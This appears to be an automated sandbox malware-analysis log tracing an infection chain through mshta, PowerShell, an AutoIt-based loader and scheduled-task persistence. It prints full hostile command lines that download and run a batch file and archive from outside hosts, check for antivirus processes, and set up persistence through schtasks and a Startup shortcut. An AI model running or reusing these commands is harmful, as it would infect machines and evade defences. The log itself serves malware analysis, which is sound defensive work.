Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2951
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2679
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2465
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2579
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5046
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 539
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7594
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2005
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msword\msword.exe
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comAPI coverage: 4.2 %
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comAPI coverage: 3.9 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 2465 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 2579 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep count: 5046 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep count: 539 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8116Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7388Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep count: 7594 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1720Thread sleep count: 2005 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com TID: 412Thread sleep time: -44000s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_004062D5 FindFirstFileW,FindClose,16_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_00402E18 FindFirstFileW,16_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00406C9B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0027A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0027A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0027A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0027A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,36_2_0026E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0027A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,36_2_0027A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0023C622 FindFirstFileExW,36_2_0023C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002766DC FindFirstFileW,FindNextFileW,FindClose,36_2_002766DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00277333 FindFirstFileW,FindClose,36_2_00277333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002773D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,36_2_002773D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_0026D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_0026DC54
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F4A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00F4A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F4A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00F4A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F3E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,38_2_00F3E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F4A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,38_2_00F4A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F466DC FindFirstFileW,FindNextFileW,FindClose,38_2_00F466DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F0C622 FindFirstFileExW,38_2_00F0C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,38_2_00F473D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F47333 FindFirstFileW,FindClose,38_2_00F47333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F3D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00F3D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F3DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00F3DC54
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00205FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,36_2_00205FC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
Source: powershell.exe, 00000002.00000002.1697397744.000000000757C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0027F4FF BlockInput
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0020338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 16_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00225058 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00EF5058 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_002620AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00232992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00220BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00220D45 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00220F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F02992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00EF0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00EF0D45 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00EF0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00261B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0020338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0026BBED SendInput,keybd_event
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0026EC6C mouse_event
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:temp + '\c2.bat'; invoke-webrequest -uri $url -outfile $output; start-process -filepath $output -nonewwindow"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_002614AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00261FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: Propose.com, 0000001C.00000003.2088771240.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000000.2081389805.0000000000473000.00000002.00000001.01000000.00000010.sdmp, LinkHub.com, 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: LinkHub.com | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00220A08 cpuid
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
